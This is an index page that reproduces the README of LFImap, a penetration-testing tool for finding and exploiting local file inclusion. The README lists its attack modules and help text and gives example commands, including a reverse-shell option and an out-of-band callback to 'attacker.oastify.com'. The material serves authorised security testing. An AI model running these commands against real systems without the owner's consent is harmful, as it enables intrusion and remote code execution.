Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/hansmach1ne/lfimap
Local File Inclusion discovery and exploitation tool
https://github.com/hansmach1ne/lfimap
command-injection exploitation lfi lfi-exploitation local-file-inclusion penetration-testing pentesting python3 remote-code-execution remote-file-inclusion rfi web-application
Last synced: 7 days ago
JSON representation
Local File Inclusion discovery and exploitation tool
- Host: GitHub
- URL: https://github.com/hansmach1ne/lfimap
- Owner: hansmach1ne
- License: apache-2.0
- Created: 2021-02-26T04:11:33.000Z (almost 4 years ago)
- Default Branch: main
- Last Pushed: 2024-10-06T16:43:44.000Z (3 months ago)
- Last Synced: 2024-12-15T06:00:53.410Z (7 days ago)
- Topics: command-injection, exploitation, lfi, lfi-exploitation, local-file-inclusion, penetration-testing, pentesting, python3, remote-code-execution, remote-file-inclusion, rfi, web-application
- Language: Python
- Homepage:
- Size: 478 KB
- Stars: 231
- Watchers: 4
- Forks: 34
- Open Issues: 5
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- Awesome-Pentest - lfimap - Local file inclusion discovery and exploitation tool (Web Tools / Metadata Tools)
README
# LFImap
### Local file inclusion discovery and exploitation toolThis project is in pre-alpha stage. Major release 1.0 coming soon with plenty of new abilities and modules.
#### Main features
- Attack with different modules
- Filter wrapper file inclusion
- Data wrapper remote command execution
- Input wrapper remote command execution
- Expect wrapper remote command execution
- File wrapper file inclusion
- Attacks with path traversal
- Remote file inclusion
- Custom polyglot command injection
- Heuristic scans
- Custom polyglot XSS, CRLF checks
- Open redirect check
- Error-based file inclusion info leak- Testing modes
- -U -> specify single URL to test
- -F -> specify wordlist of URLs to test
- -R -> specify raw http from a file to test- Full control over the HTTP request
- Specification of parameters to test (GET, FORM-line, Header, custom injection point)
- Specification of custom HTTP header(s)
- Ability to test with arbitrary form-line (POST) data
- Ability to test with arbitrary HTTP method
- Ability to pivot requests through a web proxy
- Ability to log all requests and responses to a file
- Ability to tune testing with timeout in between requests and maximum response time
- Support for payload manipulation via url and base64 encoding(s)
- Quick mode (-q), where LFImap uses fewer carefully selected payloads
- Second order (stored) vulnerability check support
- Beta/Testing phase CSRF handling support#### Documentation
- [Installation](https://github.com/hansmach1ne/lfimap/wiki/Installation)#### -h, --help
```
usage: lfimap.py [-U [url]] [-F [urlfile]] [-R [reqfile]] [-C ] [-D ] [-H ]
[-M ] [-P ] [--useragent ] [--referer ]
[--placeholder ] [--delay ] [--max-timeout ]
[--http-ok ] [--csrf-param ] [--csrf-method ]
[--csrf-url ] [--csrf-data ] [--second-method ]
[--second-url ] [--second-data ] [--force-ssl] [--no-stop] [-f] [-i]
[-d] [-e] [-t] [-r] [-c] [-file] [-heur] [-a] [-n ] [-q] [-x]
[--lhost ] [--lport ] [--callback ] [-wT ]
[--use-long] [--log ] [-v] [-h]LFImap, Local File Inclusion discovery and exploitation tool
TARGET OPTIONS:
-U [url] Single url to test
-F [urlfile] Load multiple urls to test from a file
-R [reqfile] Load single request to test from a fileREQUEST OPTIONS:
-C HTTP session Cookie header
-D HTTP request FORM-data
-H Additional HTTP header(s)
-M Request method to use for testing
-P Use a proxy to connect to the target endpoint
--useragent HTTP user-agent header value
--referer HTTP referer header value
--placeholder Custom testing placeholder name (default is "PWN")
--delay Delay in miliseconds after each request
--max-timeout Number of seconds after giving up on a response (default 5)
--http-ok Http response code(s) to treat as valid
--csrf-param Parameter used to hold anti-CSRF token
--csrf-method HTTP method to use during anti-CSRF token page visit
--csrf-url URL address to visit for extraction of anti-CSRF token
--csrf-data POST data to send during anti-CSRF token page visit
--second-method Specify method for second order request
--second-url Url for second order request
--second-data FORM-line data for second-order request
--force-ssl Force usage of HTTPS/SSL if otherwise not specified
--no-stop Don't stop using the same testing technique upon findingsATTACK TECHNIQUE:
-f, --filter Attack using filter wrapper
-i, --input Attack using input wrapper
-d, --data Attack using data wrapper
-e, --expect Attack using expect wrapper
-t, --trunc Attack using path traversal with wordlist (default "short.txt")
-r, --rfi Attack using remote file inclusion
-c, --cmd Attack using command injection
-file, --file Attack using file wrapper
-heur, --heuristics Test for miscellaneous issues using heuristics
-a, --all Use all supported attack methodsPAYLOAD OPTIONS:
-n Specify payload encoding(s). "U" for URL, "B" for base64
-q, --quick Perform quick testing with fewer payloads
-x, --exploit Exploit and send reverse shell if RCE is available
--lhost Local ip address for reverse connection
--lport Local port number for reverse connection
--callback Callback location for rfi and cmd detectionWORDLIST OPTIONS:
-wT Path to wordlist for path traversal modality
--use-long Use "src/wordlists/long.txt" wordlist for path traversal modalityOUTPUT OPTIONS:
--log Output all requests and responses to specified fileOTHER:
-v, --verbose Print more detailed output when performing attacks
-h, --help Print this help message```
### Examples
#### 1) Utilize all supported attack modules with '-a'.
`python3 lfimap.py -U "http://IP/vuln.php?param=testme" -C "PHPSESSID=XXXXXXXX" -a`![LFImap_A](https://github.com/hansmach1ne/LFImap/assets/57464251/7692235a-dfcd-4cab-b0bd-aefdd873cae6)
#### 2) Post argument testing with '-D'
`python3 lfimap.py -U "http://IP/index.php" -D "page=testme" -a`
![LFIMAP_POST](https://github.com/hansmach1ne/LFImap/assets/57464251/ebd6b1a4-8990-4a36-b321-871fe9271313)
#### 3) Reverse shell remote command execution attack with '-x'
`python3 lfimap.py -U "http://IP/vuln.php?param=testme" -C "PHPSESSID=XXXXXXXX" -a -x --lhost --lport `![LFIMAP_revshell](https://github.com/hansmach1ne/LFImap/assets/57464251/5d64244c-8a37-4019-bf2f-8fa7eb6bfd69)
#### 4) Out-of-Band blind vulnerability verbose testing support with '--callback'
`python3 lfimap.py -U "http://IP/index.php?param=testme" -a -v --callback="attacker.oastify.com"`
![LFIMAP_OOB](https://github.com/hansmach1ne/LFImap/assets/57464251/d49d3a80-1c34-49fd-97d8-eb870dae040d)
If you notice any issues with the software, please open up an issue. I will gladly take a look at it and try to resolve it, as soon as I can.
Pull requests are welcome.[!] Disclaimer: LFImap usage for attacking web applications without consent of the application owner is illegal. Developers assume no liability and are
not responsible for any misuse and damage caused by using this program.